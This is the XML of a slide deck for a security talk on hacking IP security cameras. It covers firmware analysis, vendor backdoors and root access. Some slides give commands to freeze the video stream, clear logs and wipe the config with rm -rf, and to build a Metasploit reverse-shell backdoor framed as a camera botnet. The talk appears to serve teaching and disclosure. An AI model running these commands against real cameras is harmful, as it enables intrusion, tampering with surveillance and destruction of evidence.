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69" r:id="rId5"/>
    <p:sldId id="259" r:id="rId6"/>
    <p:sldId id="270" r:id="rId7"/>
    <p:sldId id="260" r:id="rId8"/>
    <p:sldId id="271" r:id="rId9"/>
    <p:sldId id="272" r:id="rId10"/>
    <p:sldId id="273" r:id="rId11"/>
    <p:sldId id="274" r:id="rId12"/>
    <p:sldId id="275" r:id="rId13"/>
    <p:sldId id="261" r:id="rId14"/>
    <p:sldId id="262" r:id="rId15"/>
    <p:sldId id="264" r:id="rId16"/>
    <p:sldId id="265" r:id="rId17"/>
    <p:sldId id="267" r:id="rId18"/>
    <p:sldId id="268" r:id="rId19"/>
    <p:sldId id="263" r:id="rId20"/>
    <p:sldId id="276" r:id="rId21"/>
    <p:sldId id="277" r:id="rId22"/>
    <p:sldId id="266" r:id="rId23"/>
  </p:sldIdLst>
  <p:sldSz cx="13439775" cy="7559675"/>
  <p:notesSz cx="7559675" cy="10691813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6D942498-876F-488B-B6C7-F1050D899CE0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Droid Sans Fallback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380973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215900" y="812800"/>
            <a:ext cx="7126288" cy="400843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188BF6B6-12CC-4721-9092-314C53DF18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27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US" sz="2000" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none">
        <a:ln>
          <a:noFill/>
        </a:ln>
        <a:highlight>
          <a:srgbClr val="FFFFFF"/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5871001-B1A2-4D2F-81FA-83FC8C0EA956}" type="slidenum">
              <a:t>1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2126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8FF3771-35EA-4E64-BE27-4EE41C6FE05D}" type="slidenum">
              <a:t>16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80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4F5B4CA-24DE-44BD-8C67-68822AE19E34}" type="slidenum">
              <a:t>17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662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EFD8DE4-CC29-4816-B3EE-C139D52B71D5}" type="slidenum">
              <a:t>18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0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8C6B232-E9DD-4519-91BA-2788DDA6AF44}" type="slidenum">
              <a:t>19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716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7A869FE-43B9-42AB-9D6A-824CC694E345}" type="slidenum">
              <a:t>22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968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479ECF8-8AE9-4C3A-B37F-820577F8B943}" type="slidenum">
              <a:t>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8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BEB3DF2-D1B1-4AF9-9406-607901CADA2A}" type="slidenum">
              <a:t>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89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1C311A0-C8ED-432A-94BA-17BD322AB9F3}" type="slidenum">
              <a:t>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67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C8D570F-0A44-4057-BC39-D83DAC293576}" type="slidenum">
              <a:t>7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593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1C311A0-C8ED-432A-94BA-17BD322AB9F3}" type="slidenum">
              <a:t>12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026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F4CE2B8-1379-4BBB-AF0A-6DD028B5B1F0}" type="slidenum">
              <a:t>13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3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7900E39-DED6-45A7-B965-19A9A699F827}" type="slidenum">
              <a:t>14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78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B9C4A0DC-6302-44B1-9D32-8160B98BEE3E}" type="slidenum">
              <a:t>15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp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6288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15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9972" y="1237197"/>
            <a:ext cx="1007983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9972" y="3970580"/>
            <a:ext cx="10079831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AD8FAEF-144A-4293-B5AB-0623857C0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8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C8A88E-2D78-4098-AE6C-7B6416D3D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32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17839" y="402483"/>
            <a:ext cx="2897951" cy="6406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3985" y="402483"/>
            <a:ext cx="8525857" cy="64064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1547FD8-BA5E-471C-B1DC-85E8965C1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43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9FF93FA-19E9-4985-B622-8B4336240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890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6985" y="1884670"/>
            <a:ext cx="11591806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6985" y="5059034"/>
            <a:ext cx="11591806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D4CD905-5232-4262-9B92-274C387F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451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3985" y="2012414"/>
            <a:ext cx="5711904" cy="4796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886" y="2012414"/>
            <a:ext cx="5711904" cy="4796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A421B86-73C8-440A-9FF5-FF8AF7EF1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88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5" y="402483"/>
            <a:ext cx="11591806" cy="14611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736" y="1853171"/>
            <a:ext cx="5685654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736" y="2761381"/>
            <a:ext cx="5685654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03886" y="1853171"/>
            <a:ext cx="5713655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03886" y="2761381"/>
            <a:ext cx="5713655" cy="40615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F84A18F-6BCF-41D4-A5E8-B4C654C42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813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39C94CE-39AB-4E15-8725-5DB270061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102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811BBDB-81A2-4A4C-8B11-AEE79F7F6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0311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655" y="1088454"/>
            <a:ext cx="6803886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35E39B0-A478-45AD-88A0-D76EA3DAB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85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3655" y="1088454"/>
            <a:ext cx="6803886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3974198-5ACA-4A10-A667-2693C8635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5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3985" y="402483"/>
            <a:ext cx="11591806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3985" y="2012414"/>
            <a:ext cx="11591806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3985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51926" y="7006699"/>
            <a:ext cx="4535924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91841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DD40C5F-464D-4DE2-B9F4-2AA04C41DFC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black-and-red-wallpaper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58" r="41549"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8987850" y="-13648"/>
            <a:ext cx="4476881" cy="234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9650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h@lfto.m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github.com/half2me/embeddedfu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aproperadventure.com/wp-content/uploads/2013/12/DSCN0553-1024x76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3439774" cy="755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39607" y="823964"/>
            <a:ext cx="11636855" cy="1182927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r>
              <a:rPr lang="en-US" sz="7200" b="1" dirty="0"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Hacking security cameras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42018" y="5628355"/>
            <a:ext cx="3576765" cy="1423185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r>
              <a:rPr lang="en-US" sz="7200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Droid Sans Fallback" pitchFamily="2"/>
                <a:cs typeface="FreeSans" pitchFamily="2"/>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="7200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Droid Sans Fallback" pitchFamily="2"/>
                <a:cs typeface="FreeSans" pitchFamily="2"/>
              </a:rPr>
              <a:t>TYLE</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="7200" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Droid Sans Fallback" pitchFamily="2"/>
              <a:cs typeface="FreeSans" pitchFamily="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Zooming in…</a:t>
            </a:r>
            <a:endParaRPr lang="hu-H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439421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Zooming in…</a:t>
            </a:r>
            <a:endParaRPr lang="hu-H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47" t="25817" r="46761" b="43331"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="-1" y="0"/>
            <a:ext cx="13456693" cy="7559675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5486400" y="2674961"/>
            <a:ext cx="3411940" cy="2456597"/>
          </a:xfrm>
          <a:prstGeom prst="round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8394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www.logibm.qc.ca/en/Images/wallpaper1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3439776" cy="7567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hu-HU" dirty="0" err="1" smtClean="0"/>
              <a:t>Well</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" dirty="0" err="1" smtClean="0"/>
              <a:t>it’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" dirty="0" err="1" smtClean="0"/>
              <a:t>encrypted</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/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SzPct val="45000"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="hu-HU" sz="4800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:buSzPct val="45000"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="hu-HU" sz="4800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:buSzPct val="45000"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="hu-HU" sz="4800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:buSzPct val="45000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0" smtClean="0"/>
              <a:t>Network </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0"/>
              <a:t>attached? Time for a port scan :)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="61375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mtClean="0"/>
              <a:t>1. Analyzing the firmware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Binwalk is our best friend, right after Google</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Unix “file” is handy, but trust only in magic (bytes)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>DD is everywhere…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5122" name="Picture 2" descr="http://saleshq.monster.com/nfs/saleshq/attachment_images/0004/6247/Backdoor_crop380w.jpg?127783614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439775" cy="755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072292" y="5731740"/>
            <a:ext cx="7635615" cy="1569660"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF00"/>
          </a:solidFill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hu-HU" sz="3200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>An </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="3200" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>insane</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="3200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="3200" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>amount</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="3200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> of IP „</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="3200" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="3200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="3200" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cameras</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="3200" b="1" dirty="0" smtClean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lang="hu-HU" sz="3200" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>used</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="3200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="3200" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>all</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="3200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> over </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="3200" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="3200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="3200" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>world</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="3200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="3200" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>feature</a:t>
            </a:r>
            <a:endParaRPr lang="hu-HU" sz="3200" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="hu-HU" sz="3200" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>vendor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="3200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="3200" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>implemented</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="3200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> BACKDOORS!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mtClean="0"/>
              <a:t>Everybody loves a root shell...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What to do after you got root?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Look around, get comfortable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Dump flash with dd (the firmware update file doesn't always have everything)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Modify stuff, hack around…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Lets do some hollywood stuff :)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Freezing the stream</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/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kill -SIGSTOP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>pid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>pid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>fvideoencoder</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp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941696" y="3030538"/>
            <a:ext cx="12095163" cy="16827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Un-freezing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4906" y="5070865"/>
            <a:ext cx="10850026" cy="7285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1986" lvl="0" indent="-251986" defTabSz="1007943">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1102"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="3086"/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="755957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646"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1259929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2205"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1763900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4pPr>
            <a:lvl5pPr marL="2267872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5pPr>
            <a:lvl6pPr marL="2771844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6pPr>
            <a:lvl7pPr marL="3275815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7pPr>
            <a:lvl8pPr marL="3779787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8pPr>
            <a:lvl9pPr marL="4283758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9pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>kill </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-CONT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>pid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>pid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>fvideoencoder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Resetting user passwords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If we have root, why not reset access passwords, and clear logs (telnet is not logged)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Logs: /mnt/mtd/Log/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Config: /mnt/mtd/Config (logins, passwords)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:buSzPct val="45000"/>
              <a:buFont typeface="StarSymbol"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/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/mnt/mtd is mounted rw :)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:buSzPct val="45000"/>
              <a:buFont typeface="StarSymbol"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/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Just “rm -rf /mnt/mtd/*” to reset camera to factory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mtClean="0"/>
              <a:t>Metasploit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smtClean="0"/>
              <a:t>IP Camera botnet?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>ReverseTCPShell:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>msfconsole</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>use linux/armle/shell_reverse_tcp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>set LHOST 192.168.1.107</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>set SHELL /bin/sh</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>generate -f backdoor -t elf</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>use exploit/multi/handler</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>set PAYLOAD linux/armle/shell_reverse_tcp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>set LPORT 4444</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>exploit # :)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hu-HU" dirty="0" err="1" smtClean="0"/>
              <a:t>Nuclear</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" dirty="0" err="1" smtClean="0"/>
              <a:t>Powerplant</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" dirty="0" smtClean="0"/>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ightseeing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481" y="1863671"/>
            <a:ext cx="7134927" cy="53511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7999" dirty="0"/>
              <a:t>Benjamin Tamási</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buSzPct val="45000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3466" dirty="0"/>
              <a:t>IT Security Researcher and Instructor at NetAcademia</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buSzPct val="45000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3466" dirty="0"/>
              <a:t>Student at Budapest University of Technology</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buSzPct val="45000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3466" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="3466" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="hu-HU" sz="3466" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buSzPct val="45000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3466" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="3466" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="3466" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="3466" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="3466" dirty="0"/>
              <a:t>Contact info:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buSzPct val="45000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3466" dirty="0"/>
              <a:t>Email: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3466" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>h@lfto.me</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buSzPct val="45000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3466" dirty="0" err="1"/>
              <a:t>Github</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3466" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3466" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://github.com/half2me/embeddedfun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219666" y="4026093"/>
            <a:ext cx="5323421" cy="15831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218" name="Picture 2" descr="newneta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3075" y="4258105"/>
            <a:ext cx="4423057" cy="125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32" t="18599" r="10633" b="26229"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="-1"/>
            <a:ext cx="13427901" cy="7559675"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27913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00" t="37774" r="28861" b="28482"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="-1"/>
            <a:ext cx="13423391" cy="7559675"/>
          </a:xfr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5759" r="13753"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4342020" y="5279937"/>
            <a:ext cx="8906006" cy="2041743"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="57150"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79666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Modify the webUI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We can mount samba shares :)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2666"/>
              <a:t>mount -t cifs -o username=GUEST,password=p //192.168.1.107/smb /mnt/samba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Umount and remount /mnt/web from a samba share (here we have rw access, we can modify anything without damaging the device)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4811" y="5018765"/>
            <a:ext cx="11270153" cy="1379327"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="none" lIns="119991" tIns="59995" rIns="119991" bIns="59995" anchorCtr="0" compatLnSpc="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4266" dirty="0"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We can use this to swap out the video stream</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4266" dirty="0"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to something else :)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Let's hack security cameras!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What does hollywood have to say? :)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========VIDEOCLIPS=========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mera Hollywood Styl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1113" y="-184150"/>
            <a:ext cx="13450888" cy="7743825"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="290796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Is it really that easy?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How</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" dirty="0" err="1" smtClean="0"/>
              <a:t>my</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" dirty="0" err="1" smtClean="0"/>
              <a:t>cat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" dirty="0" err="1" smtClean="0"/>
              <a:t>hacked</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" dirty="0" smtClean="0"/>
              <a:t> IP „</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" dirty="0" err="1" smtClean="0"/>
              <a:t>security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" dirty="0" smtClean="0"/>
              <a:t>” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" dirty="0" err="1" smtClean="0"/>
              <a:t>cameras</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" dirty="0" smtClean="0"/>
              <a:t>?</a:t>
            </a:r>
            <a:endParaRPr lang="hu-HU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2" descr="http://s5.favim.com/orig/51/cat-camera-look-Favim.com-48191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56920" y="2012950"/>
            <a:ext cx="8525934" cy="479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935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mtClean="0"/>
              <a:t>Where can we attack?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Typical ways to attack embedded systems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Reverse Engineer the firmware from a firmware update file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Dump contents of flash memory by de-soldering the flash chip</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Find debug ports onboard (JTAG, UART)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Fuzz device inputs, command injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>What are we looking for?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Unfiltered input</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
